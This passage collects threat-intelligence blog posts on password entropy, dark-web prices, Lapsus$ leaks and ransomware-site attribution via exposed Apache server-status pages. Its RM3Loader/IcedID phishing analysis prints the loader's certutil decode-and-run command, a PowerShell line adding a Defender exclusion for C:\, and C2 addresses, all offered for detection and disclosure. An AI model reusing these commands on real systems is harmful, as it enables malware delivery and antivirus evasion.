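    # "Zx9!qLm2Tp" is a constructed string that is not in the wordlist.
    for pw in ("123456", "fiona2014", "P@ssw0rd", "Zx9!qLm2Tp"):
        formula = entropy_bits(CHARSET_SIZES[pool_for(pw)], len(pw))
        print(f"{pw:12} {pool_for(pw):36} formula={formula:6.2f} effective={effective_bits(pw):6.2f}")
```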

So a crucial question remains: what should be done with this information?  We sincerely hope that what we’ve discussed here will highlight the need for strong and enforced password policies.  These should factor in the following:

  • Use of alphanumeric and special characters
  • Mandatory lengths (at least 10, but longer is better)
  • No password reuse
  • Frequent and enforced password changing.

Wherever possible, we would highly recommend the use of password managers.  They can save a lot of time for users, allow for significantly more complex passwords to be used, and only require the user to remember one password.  We don’t recommend using one product over another, but one such example would be KeePassXC.  KeePassXC is a host-based password vault which keeps passwords encrypted when not in use.  It offers numerous options for password generation, varying the characters used, length etc.  The benefit of this is that you can generate passwords up to 128 characters long, which simply need to be copied and pasted whenever they are required.  Here is one such example with an entropy value of 715:

J4kKutHec3RYxQo3kpm4mot5EAVp&opRCSr&x4J5r%fQ$XxzrjdW2ZgRg@k42XhA@zz`S4ofiR4~^s`&43zZ@JQ&qQ$Mad2^jtQdHSZ@hbJbVk5Qabvs5Kc$KW3#W@Rm

What our external research shows

Research conducted by NordPass in 2022 identified that the average person has approximately 100 user accounts requiring password verification.  This is the most probable cause of password reuse and password fatigue, where users are exasperated by the constant need to generate unique strong passwords and fall into the habit of using weak, easy-to-remember passwords, or reusing old ones.  Verizon’s Data Breach Investigations Report, published in 2021, estimates that 80% of hacking-related breaches were the result of stolen or brute-forced credentials.  This number could be significantly reduced by ensuring and maintaining good password hygiene.

Forgetting passwords can have a significant impact on the password owner, the services they use, and the organisations they work for:

  • Research firm Forrester has indicated that, for some organisations, the costs associated with handling password resets could be up to $1 million USD per year.  Gartner estimates that around 40% of help desk queries in large companies relate to password resets, taking up a substantial part of billable work, and taking focus away from more business-critical support.
  • In 2017, MasterCard and the University of Oxford published a study looking at users of online shopping platforms.  Their research indicates that 33% of users would abandon a purchase if they could not remember an account password, while 19% would abandon a purchase while waiting for a password reset link.
  • Chainalysis, a cryptocurrency data firm, estimates that 20% of all mined Bitcoin is locked in lost or otherwise inaccessible wallets.  In one such example, a user has 7002 Bitcoins locked on a hard drive which risks being encrypted following two more incorrect password attempts.

What is SOS Intelligence doing, and how can it benefit you?

At SOS Intelligence, we understand the risk that credential theft can pose to the security of your data.  What we can provide is early detection for when your data has been exposed. 

We are actively collecting and analysing stolen credentials from multiple sources which feeds into our intelligence pipeline.  Within moments of ingestion, we can generate bespoke alerts for you to indicate when you may be at risk.  Early detection is vital to allow you to take action before an issue becomes serious and impactful against your business.

If you are serious about your cyber security, why not book a demo?

Photos by Ed Hardie on Unsplash,  Ryunosuke Kikuno on Unsplash, Joshua Hoehne on Unsplash

Investigation, The Dark Web

Dark Web Services Current Average Prices

It started with a tweet.

The dark web has long been associated with illegal activities and the sale of illicit goods and services. Among the many services offered on the dark web, hacking services are particularly prevalent.

Daniel’s tweet

We had our PIR and got to writing an Intelligence Requirements sheet following the PESTLEP model, which allowed us to prioritise our Collection Plan.

Collection plan.

With this, we were able to start our collection process and begin answering Daniel Card’s tweet.

The collection process consisted of using the SOS Intelligence platform to identify currently active marketplaces for the specific IR areas we had to answer.

Our platform has the capability to scan the dark web very quickly, with the ability to rotate around all active Onion services within 24-48 hours. This gives us a clear view of current and active Onion services.

In addition, SOS Intelligence has a broad range of automatic closed and open forum collection, giving us a real-time view into purchases and sales.

We then gathered the relevant information and calculated averages per service, per marketplace.

The research

The research for this article looked at around 40 different current dark web marketplaces and clear web and dark web forums, where hacking services are commonly offered for sale. The average prices for the services mentioned were determined based on the information gathered from these sources.

According to our research, the average price for a stolen credit card on the dark web is around $243.15.

This may seem like a low price, but the value of a stolen credit card can vary depending on the country it was issued in and the remaining balance on the card. For example, a credit card from the United States may be worth more than one from a less economically developed country. To keep things as like-for-like as possible, we took the average card limit for a US bank.

Counterfeit money is also commonly available on the dark web, with the average price per $1,000 coming in at around $396.24.

This may seem like a high price, but it’s important to remember that producing high-quality counterfeit money can be a time-consuming and expensive process.

Botnets, which are networks of compromised computers used to launch distributed denial of service (DDoS) attacks, are also commonly available on the dark web.

The average price for a botnet or DDoS attack is around $382.41.

Another common service offered on the dark web is the sale of so-called residential proxies, which are more difficult to detect and block as they “proxy” a cybercriminal’s connection out through a residential ISP. These proxies are used to mask the true IP address of the user and are often used by hackers to avoid detection.

The average price for a residential proxy is around $645 per month.

Finally, initial access to a target network is often available for sale on closed forums and marketplaces. This can include login credentials or vulnerabilities in a network that can be exploited to gain access. Initial Access (IA) is typically the first ‘open door’ into a victim’s network and can lead to ransomware.

Prices for this service ranged widely, from a few hundred dollars to tens of thousands, owing to the wide range of victims and seller motivations, and varying greatly depending on the access offered, the method of access and the compromised company.

The average price for initial access to a network is around $7,700. 

In conclusion, the dark web is a hub for a wide range of hacking services, from stolen credit card information to initial access to target networks.

While the prices for these services may seem steep, it’s important to remember that, at least for some of the services offered, there is more demand than supply.

It is also important to note that there is no guarantee with any of the services provided, and the sellers or marketplaces themselves could be scams or scammers, although a majority do offer purchase through escrow.

Header photo by Jefferson Santos on Unsplash.

Investigation

Investigation into the RM3Loader lnk delivery with a Michael Page recruitment campaign theme

Authors: Manraj and Amir Hadzipasic

SOS Intelligence observed an unusual phishing campaign that appeared to be delivering a PDF. Although malware is not a focus for us we couldn’t ignore the opportunity to investigate a new and interesting malware delivery mechanism.  

Sample 1 Email Headers

spf=pass [email protected];

dkim=pass header.d=aruba.it header.s=a1;

dmarc=none

Received: from smtp202-pc.aruba.it (smtp202-pc.aruba.it [62.149.157.202])

by with ESMTP id 3jsqqq1e9h-1

for <>; Tue, 27 Sep 2022 15:28:52 +0100

Received: from [127.0.0.1] ([83.32.137.88])

Content-Type: text/html; charset=UTF-8

Subject: A New Career Opportunity

From: "Michael Page Recruitment" <[email protected]>

Date: Tue, 27 Sep 2022 07:28:51 -0700

Message-ID: <[email protected]>

To: 

X-Mailer: Apple Mail (2.2104)

Link: https://kakjumi[.]com/download/?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&t=[REDACTED]&id=[REDACTED]

Updated Date: 2022-09-08T07:00:00Z

Creation Date: 2020-07-09T07:00:00Z

Registrar Registration Expiration Date: 2023-07-09T07:00:00Z

Registrar: NameSilo, LLC

Redirects to

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&id= [REDACTED]

Updated Date: 2022-08-23T00:00:00Z

Creation Date: 2022-08-23T02:51:42Z

Registrar Registration Expiration Date: 2023-08-23T00:00:00Z

Registrar: ERANET INTERNATIONAL LIMITED

Sample 2 Email Headers

spf=pass [email protected];

dkim=pass header.d=encoreshop.com.br header.s=20211014;

dmarc=none

Received: from us2-ob2-1.mailhostbox.com (us2-ob2-1.mailhostbox.com [162.210.70.55])

by with ESMTPS id 3jsqqq1f8t-1

(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)

for <>; Tue, 27 Sep 2022 16:46:13 +0100

Received: from [127.0.0.1] (unknown [87.116.246.51]

From: "Michael Page Recruitment" <[email protected]>

Subject: Work with us

Date: Tue, 27 Sep 2022 08:46:10 -0700

Importance: normal

X-Priority: 3

Content-Type: text/html; charset="UTF-8"

Link:

https://tyte-hosting[.]com/download/?t=[REDACTED]&close=[REDACTED]&ynu=[REDACTED]&rht=[REDACTED]&pass = [REDACTED]&id=[REDACTED]

Updated Date: 2022-09-21T16:51:32Z

Creation Date: 2004-09-25T05:30:32Z

Registrar Registration Expiration Date: 2023-09-25T05:30:32Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Redirects to:

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close =[REDACTED]&id=[REDACTED]

Phishing/Malware download page

The application appears to be more advanced than generic phishing kits. It features an initial CAPTCHA and a number of API callbacks. 

Downloaded Zip LNK content, self-referencing

%comspec% /c if exist %tmp%\temp1_job_offer.zip\job_description.pdf.lnk  (certutil.exe -decode %tmp%\temp1_job_offer.zip\job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta) else (certutil -decode job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta)

This ensures that the HTA file is produced regardless of how the LNK is executed, whether from within the zip archive via cmd.exe /c or after being dropped via certutil decode – in parallel.

Certutil is used to decode the embedded BASE64 encoded HTA file.

It is then called for execution by the &start statement. 

The HTA file is nested and self-referencing; it contains the decoy PDF, what is assumed to be the IcedID DLL, and other elements.

The HTA code is self-contained, encoded in base64 within the pdf.lnk and disguised as a certificate; it is decoded and written out as a .HTA when the certutil -decode command is run.

Hta file structure  

HTTP Callback

This function may just be for statistics/tracking purposes.  

Offset extraction, launching of decoy PDF  and dll

Offset extraction is performed using ADODB.Stream to read and write parts of the HTA document: the sample we saw loads sections of embedded content and saves them to the user profile temp location by referring to specific file offsets. This is done by wrapping the file’s openastextstream() call inside a mid() function and selecting the start position and length of the string.

:x=mid(fil.openastextstream().read(fil.size), 7928,85890)

The dll is loaded via regsvr32 passing the /s (silent) flag. It has been observed that the dll will not execute with regsvr32 unless the /s flag is used.

The dll is 342,323KB! However, after offset 000837E0 the entirety of the DLL’s contents is \x20 (space). I noticed that this may(?) be an anti-analysis technique, as most sandboxes will not accept a file over 60mb and tools such as CFF Explorer will not effectively handle a dll over 40mb.

Calls to 91.240.118.155 over HTTPS (michaelpageuk5ukln.com, prakebtpboylodod.com)

Prakebtpboylodod.com hosts http://prakebtpboylodod[.]com/s2.dll which appears to be fetched by the originally loaded dll.

The script also adds a Defender exclusion for “C:\” and then waits for 15 seconds

set q=CreateObject("WScript.Shell"):q.Run "powershell -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA",0:q.Run "timeout.exe /t 30", 0, True

Encoded Powershell command:

Add-MpPreference -ExclusionPath "C:\";timeout 15

A further timeout.exe is run for 30 seconds. 

Timeout.exe being run in your environment should be suspicious. 

Execution Overview Diagram 

Although the HTA-embedded PDF is benign in itself, seeing it open in msedge after the LNK is clicked, whether from within the zip archive or externally, is an indicator of infection.

Network based indicators 

Once the DLL is run, regsvr32.exe makes connections from different local ports to port 443 on the remote host. The local port numbers that connections come from increment sequentially when a connection cannot be established. Seeing regsvr32.exe make multiple outbound connections should be considered suspicious.

In addition to this, seeing timeout.exe making outbound connections to port 443 should also be considered suspicious.

Host based indicators

Files created

C:\Users\%USERPROFILE%\AppData\Local\Temp\temp1_job_offer.zip

C:\Users\%USERPROFILE%\AppData\Local\Temp.hta

C:\Users\%USERPROFILE%\AppData\Local\Temp\job_description.pdf

C:\Users\%USERPROFILE%\AppData\Local\Temp\x.dll

This loader seems to prefer to store files within the temp folder, using the user environment variable %tmp% or GetSpecialFolder(2) (2 = Temp).

File hashes:

dll: e2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd
pdf: e2981bd67116d744e2af43b0fc864e255dd57b1b961110df12a3d98ec465e947
Second “dll”: a5a211ceeccbe61c374fec9286e0185674a2ba98bc82711cf61f57b586fd7f19
job_offer.zip: 3bcfe639a418ffca0e3e839dc19d394b7b4455ce24db3fbb5cc09a7169da4046

dll runtime IOCs 

RM3Loader CnC Panel communication:

Higmon.cyou
Prises.cyou
45.8.147.179
45.67.229.39

Stark-Industries is an allegedly Russian-owned and -operated hosting company that has been observed being used by a number of campaigns.

[ref] https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-rce-flaw-to-install-backdoors/

[ref] https://twitter.com/JAMESWT_MHT/status/1558171595562254340

Task Item embedded in email sample:

We are unsure exactly how this feature applies, but it could be something specific to an Outlook client allowing for automatic creation of a Task.

The activity of using a zip file with a document inside (in our unique case a pdf.lnk) has previously been observed with the IcedID malware. Both cases use mshta.exe to execute an .hta file, which then results in a malicious dll being written to disk.

The main difference is that the previously observed activity documented by VMware uses the .hta to download the dll from a remote server, whereas we have observed a unique method of unpacking and executing the first-stage payload. The pdf.lnk contains the .hta file, base64-encoded and disguised as a certificate.

When this is decoded and written to disk, the .hta then references itself by offset to unpack the malicious dll and decoy pdf. https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html

Another similar sample can be found here, with a number of other public submissions being attributed to IcedID. A commonality with these samples is that they present themselves as business-related documents (invoice.zip, request.zip etc.); however, when unzipped they turn out to be .rtf documents, Word documents with macros, or .lnk files disguised as folder shortcuts (Documents.lnk).  https://any.run/malware-trends/icedid

Key takeaways

  • RM3Loader is using a self-referencing LNK file to execute commands that refer back to the LNK itself.
  • The payload is contained within the dropped zip file and decoded using certutil.
  • The LNK does the important job of decoding the embedded HTA file and executing it.
  • The HTA contains VBScript that references content embedded in the HTA file itself to deploy a decoy PDF document and load the IcedID dll.
  • IcedID behaviour has not significantly changed.
Investigation

SOS Intelligence analysing Lapsus$ data and breaches

We’ve been tracking what Lapsus$ have been doing and analysing the data from the latest breaches. As with most hacking collectives, SOS Intelligence has been aware of and tracking the activity of the LAPSUS$ group for some time.

The group has contributed to some high-profile and high-impact breaches in the last few months. They have been using what could be considered fairly “low tech” methods to gain a foothold on their targets. Using our multi-faceted intelligence collection pipelines, we are able to keep track of the group’s activities and announcements.

This time, the data included a large amount of GitHub source code that appears to belong to Globant, a major company with over 16000 employees and $1.2 billion in revenue for 2021. This includes a number of repositories that contain “very sensitive information” such as TLS certificate private keys and chains, Azure keys and API keys for 3rd-party services.

TechCrunch have written about this and we were quoted on their article:

SOS Intelligence, a U.K-based threat intelligence provider that analyzed the leaked data, told TechCrunch that “the leak is legitimate and very significant, as far as Globant and Globant impacted customers are concerned.”

Techcrunch, March 30th 2022

Lapsus$ were in the news only days ago, with an Oxford teen accused of being a multi-millionaire cyber-criminal connected with the group. Joe Tidy has an excellent article about what happened and how the teen in question was “doxxed” over on the BBC.

ITPro also covered this with comment from ourselves:

“From the paths I have looked at so far it looks like legitimate source code for mobile apps,” said Amir Hadžipašić, CEO and founder of SOS Intelligence to IT Pro. “It looks like there are internal microsites and data for them too, CVs and other personal information.

“That’s not all, they have full private keys for certs in most of the directories,” he added. “That there would be enough for me to stand up a website and serve their SSL and it be valid.”

IT Pro, 30th March 2022

Last but not least, we spoke to Bleeping Computer who have also covered this:

“In terms of legitimacy, going just by volume alone it’s hard to fabricate that amount of data – however samples of the data have been cross referenced with live systems and other methods that show the leak is legitimate and very significant as far as Globant and Globant’s impacted customers are concerned”.

Bleeping Computer, March 30 2022

For any size organisation, we help you sleep easier by giving you real time alerts of key phrases, emails and domains that appear on the Dark Web. For a demo, click here and we look forward to helping you.

Photo by Clint Patterson on Unsplash.

Investigation, Ransomware

A Special Investigation exposing a ransomware group’s clear-web IP and their duplicate identities

Intro

Before we dive into this investigation, it’s worth spending a brief moment describing the Apache server-status page.

The Apache server-status page is a diagnostics and metrics page provided by the mod_status module. When mod_status is enabled, a metrics page is served on localhost at the /server-status path.

This page is typically served to localhost only. It offers diagnostic information about the Apache service and client requests, including the full request URI and client IP information.

Serving this page in production, beyond localhost, would be considered an information disclosure vulnerability: it could offer an attacker information about client requests, essentially anything disclosed in a GET request URI or the URI of a POST request.

In the scope of Tor onion services, publishing a Tor service inherently exposes all localhost services to the entirety of Tor – so any services designed to be protected by the typically non-externally-routable loopback interface become externally accessible.
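As an added illustration (not configuration taken from the investigation or from any server discussed in it), the mod_status fragments below show the usual localhost-only restriction next to the reason it offers no protection behind an onion service: Tor's HiddenServicePort hands every visitor's connection to Apache from 127.0.0.1, so Require local is satisfied for all of them. The safer layout keeps the status handler off the listener the onion service forwards, or drops the module entirely; the torrc line and port numbers are assumed for the example.

```apache
# --- Weak: the loopback check is passed by every Tor visitor ---
# Assumed torrc for the onion service:  HiddenServicePort 80 127.0.0.1:80
# Tor connects to Apache from 127.0.0.1, and "Require local" matches 127.0.0.0/8
# and ::1, so the page (with client IPs and full request URIs) is public on Tor.
<Location "/server-status">
    SetHandler server-status
    Require local
</Location>

# --- Safer: no status handler on the onion-facing listener at all ---
# Simplest fix: do not load mod_status (Debian/Ubuntu: a2dismod status).
# If the metrics are needed, bind them to a listener Tor does not forward and
# keep HiddenServicePort pointing only at port 80.
Listen 127.0.0.1:8081

# Server-level directive (not valid inside VirtualHost): with ExtendedStatus Off
# the page shows only the worker scoreboard, no per-request URIs or client IPs.
ExtendedStatus Off

<VirtualHost 127.0.0.1:8081>
    <Location "/server-status">
        SetHandler server-status
        Require local
    </Location>
</VirtualHost>

<VirtualHost 127.0.0.1:80>
    # The onion-facing vhost: refuse the path outright so a Tor visitor gets 403
    # even if another include re-enables the handler.
    <Location "/server-status">
        Require all denied
    </Location>
</VirtualHost>
```

The same reasoning applies to any other loopback-only admin endpoint reached through the forwarded port: "local" means the Tor daemon, not the operator.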

Locating Onions with Server-Status Pages

We must first export a list of all onions we are aware of that have server-status pages. One of the tasks we perform when crawling an onion service is to identify interesting paths and services. We perform a check for common directories such as server-status along with many others.

This process is identical to a directory enumeration, except for being far more optimised to ensure crawler performance is prioritised.

Therefore, using our path API, we are able to query for all onions we’ve found that are operational and have server-status pages:

server path search for server-status pages API

We find that there are 1,370 results with server-status pages:

Search results JSON export

The next task is to compile a list of all known (relatively current) ransomware blogs. We do this by merging our own lists, those we’ve found via OSINT and other published ransomware group site lists.

Of those, we find a total of 71 unique onion addresses; these include v2 and v3 onions.

Now we have a relatively straightforward task of cross-checking our server-status results against this list to see what ransomware group sites have server-status pages, if any.

We do this with a very simple bash script that uses the grep tool:
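The grep script itself is not reproduced on this page; as an added example (not SOS Intelligence's own script), the cross-check below does the same job in Python: it pulls every v2 (16-character) or v3 (56-character) onion hostname out of each input as raw text, so the JSON export and a one-address-per-line list can be compared without a parser for each, and returns the intersection. The sample export shape and all onion names are constructed placeholders, not real services.

```python
import json
import re

# Onion hostnames: v2 addresses are 16 base32 characters, v3 addresses are 56.
# Matching the hostname alone means a JSON export, a URL list or a pasted page
# can all be fed in as raw text without writing a parser for each format.
ONION_RE = re.compile(r"\b([a-z2-7]{56}|[a-z2-7]{16})\.onion\b", re.IGNORECASE)


def extract_onions(text: str) -> set:
    """Every onion hostname appearing anywhere in `text`, lower-cased and deduplicated."""
    return {m.group(0).lower() for m in ONION_RE.finditer(text)}


def cross_check(server_status_export: str, ransomware_blog_list: str) -> list:
    """Onions that both expose /server-status and appear on the known ransomware blog list."""
    return sorted(extract_onions(server_status_export) & extract_onions(ransomware_blog_list))


# Constructed sample data (placeholder names, not real onion services).
V3_BLOG = "ransomblogexample" + "a" * 39 + ".onion"   # 56 chars before .onion
V2_BLOG = "exampleblogaaaaa.onion"                      # 16 chars before .onion
V2_FORUM = "forumexampleaaaa.onion"                     # has server-status, not a blog
V3_LEAK = "leaksite" + "b" * 48 + ".onion"              # on the blog list, no server-status

# What a "server-status hits" JSON export from the crawler might look like (assumed shape).
SAMPLE_EXPORT = json.dumps([
    {"url": f"http://{V3_BLOG}/server-status", "status": 200},
    {"url": f"http://{V2_BLOG}/server-status", "status": 200},
    {"url": f"http://{V2_FORUM}/server-status", "status": 200},
])

# The merged ransomware blog list: mixed formats and case, one entry per line.
SAMPLE_BLOGS = "\n".join([V3_BLOG, f"http://{V2_BLOG.upper()}/", V3_LEAK])

if __name__ == "__main__":
    for onion in cross_check(SAMPLE_EXPORT, SAMPLE_BLOGS):
        print(onion)
```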

Checking our output, we see that there are in total only 3 ransomware blogs/group sites:

Arvin Club, Haron & Midas

Checking the first, Arvin Club:

We see that the server status page presents a vhost of localhost, not much to go by!

We also note that the server is running Ubuntu and is located in the UTC time zone.

Haron Server-Status Page

Checking the Haron server-status page, we see that again the vhost is localhost, the server is running Debian and the time zone is Moscow Standard Time (MSK).

Lastly, checking the Midas server status page:

Midas Server-Status Page

We see a VHOST that is not localhost, this time it shows as “Becquerel.selectel.ru”

The server is running Debian with a time zone of Moscow Standard Time.

Becquerel.selectel.ru

The hostname exposed in the server-status page for Midas shows that the web server running the Midas blog is hosted by Selectel, a Russian cloud hosting company:


For at least a short period of time the clear web portion of the Midas blog was exposed to the internet allowing Google to crawl and index the server-status page. 

The Google cache is of an AWS IP in Germany, “3.70.39.23”. According to the Google cache entry, the server was exposed at least up to the 27th of September 2021, likely some time before that date, and possibly after the 2nd of October 2021.

How are we sure that this cache entry is the Midas blog web-server? 

It could very likely have been another server if Selectel reprovisions hostnames. However, the evidence contained in the server-status client requests for the Becquerel host cache page is unique to the files found on the current Midas blog.

Identical files requested in the Google Cache as what exists on the Midas blog web server

We can say with strong certainty that the cache entry, the clear-web IP and hostname all belong to the Midas web server and that the host is current and operational. 

Linking Midas to Haron and Avaddon

Reviewing the client request on refresh revealed some interesting paths. These paths point to image and file locations. Further investigation of these paths uncovered content that is shared or identical to both the Haron and Midas blogs. 

For example…

Haron test.jpg image

Midas test.jpg image

Artist: https://twitter.com/JarekMadyda

Midas Victim file [redacted]

Identical victim file on the Haron web server

Midas Mess directory

Mess directory

Identical but older Mess directory on the Haron web server

Haron mess directory

There is significant cross-referencing between folder structures and files showing that the Midas web blog is a copy of the Haron web blog, going by the last-modified date stamps on all of the files we have been able to observe across both blog sites.

Not only does the sharing of files and file structure suggest that this is the same group/operator, but both web sites also carry each other’s logos.

Further, we can see logo “development” taking place, with logo names such as “newlogo2.png” and “finalLogo.png”. We propose it would be very unusual for one seemingly competing group to have another group’s logo on their web server, and indeed for them to have each other’s!
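The server-status analysis above (vhost, OS banner, time zone) and the cross-referencing of requested paths between the two blogs can be reproduced with a small parser. The following is an added example written for this article, not SOS Intelligence tooling; the two status pages are constructed samples in Apache mod_status layout, and the victim file name is a placeholder.

```python
import re

# Constructed samples in mod_status layout; not captures from the Midas or Haron servers.
HARON = """<h1>Apache Server Status for localhost (via 10.0.0.2)</h1>
<dl><dt>Server Version: Apache/2.4.38 (Debian)</dt>
<dt>Current Time: Monday, 04-Oct-2021 12:00:00 MSK</dt></dl>
<table><tr><th>Srv</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td>0-0</td><td>10.0.0.9</td><td>localhost:80</td><td>GET /img/test.jpg HTTP/1.1</td></tr>
<tr><td>0-1</td><td>10.0.0.9</td><td>localhost:80</td><td>GET /mess/victim_placeholder.zip HTTP/1.1</td></tr>
<tr><td>0-2</td><td>10.0.0.9</td><td>localhost:80</td><td>GET /img/newlogo2.png HTTP/1.1</td></tr>
</table>"""
# Midas sample: same layout, but a non-localhost vhost and a different logo file.
MIDAS = HARON.replace("localhost", "Becquerel.selectel.ru").replace("newlogo2", "finalLogo")

TAG = re.compile(r"<[^>]+>")

def rows(html):
    """Yield each <tr> of the status page as a list of cell texts with tags stripped."""
    for tr in re.findall(r"<tr>(.*?)</tr>", html, re.S):
        cells = re.findall(r"<t[dh][^>]*>(.*?)</t[dh]>", tr, re.S)
        yield [TAG.sub("", c).strip() for c in cells]

def parse_status(html):
    """Extract the fields the investigation relied on: banner, time zone, vhosts, request paths."""
    banner = re.search(r"Server Version:\s*([^<\n]+)", html)
    clock = re.search(r"Current Time:\s*([^<\n]+)", html)
    info = {"server": banner.group(1).strip() if banner else "",
            "tz": clock.group(1).split()[-1] if clock else "",   # last token, e.g. MSK
            "vhosts": set(), "paths": set()}
    header = None
    for row in rows(html):
        if "VHost" in row and "Request" in row:
            header = (row.index("VHost"), row.index("Request"))
        elif header and len(row) > max(header):
            info["vhosts"].add(row[header[0]].rsplit(":", 1)[0])   # drop the :port suffix
            req = re.match(r"(?:GET|POST|HEAD)\s+(\S+)", row[header[1]])
            if req:
                info["paths"].add(req.group(1))
    return info

def exposed_hostnames(info):
    """Non-localhost vhosts: these are what tie an onion-fronted site to clear-web hosting."""
    return sorted(v for v in info["vhosts"] if v != "localhost")

def shared_paths(html_a, html_b):
    """Paths requested on both hosts: the file-level cross-referencing described above."""
    return sorted(parse_status(html_a)["paths"] & parse_status(html_b)["paths"])

if __name__ == "__main__":
    for name, page in (("Haron", HARON), ("Midas", MIDAS)):
        i = parse_status(page)
        print(name, i["server"], i["tz"], exposed_hostnames(i))
    print("shared:", shared_paths(HARON, MIDAS))
```

The same parser run against your own Apache hosts shows exactly what an unrestricted /server-status page gives away.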

The curious case of Avaddon

On the topic of logos: investigation showed that both Haron and Midas contained the logo file for the Avaddon ransomware group:

There were rumours not only that Haron and Midas were the same group, but also that Haron had links to Avaddon.

Forum post on the Dublikat (Duplicate) dark web forum:

“Haron is built on code copied from other ransomware. So, the researchers noticed the following “parallels”: to create binaries, Haron uses the old ransomware builder Thanos; The ransomware site, where victims are asked to negotiate and pay the ransom, is almost identical to Avaddon’s site (as is the site for leaking stolen data); the ransom letter contains large snippets of text copied from a similar Avaddon note; Haron’s server contains icons and images previously found on the official Avaddon website. What all these similarities are connected with is still unclear. The researchers believe that the Haron operators may have hired one of the former Avaddon members, but they clearly did not have access to the source code of the Avaddon ransomware.”

Translated.

We are now able to shed a bit more light on this forum post. It would seem that not only did Haron share resources, images, text and icons with Avaddon, but Midas now does too, since it is just a copy of the Haron blog.

Although Avaddon is now defunct and their onion address is no longer valid, we’ve been able to extract an HTML cache of their page from our index.

Making minor changes to the HTML code to reference the Midas and Haron onion addresses, we’ve effectively been able to “resurrect” the old Avaddon website.

Minor HTML updates to the historic Avaddon HTML source:

These minor updates allowed us to load the HTML source and have the page render almost exactly as it would have done in the past.

Avaddon website resurrected, loaded locally from a file:

This works because the file and folder structure of the Haron / Midas websites still contains the original logo, CSS and other content that were made for the Avaddon ransomware group website.

We are therefore able to put forward the claim, supported by the evidence in this article, that all previous suggestions that these groups were interlinked appear to be correct.

We’ve confirmed the following Clear Web IPs for both Haron and Midas, both hosted by Selectel Russia:

45.146.164.58 – Midas

45.93.201.176 – Haron

This proves our assumption that the blogs are hosted on separate VMs both hosted at Selectel.
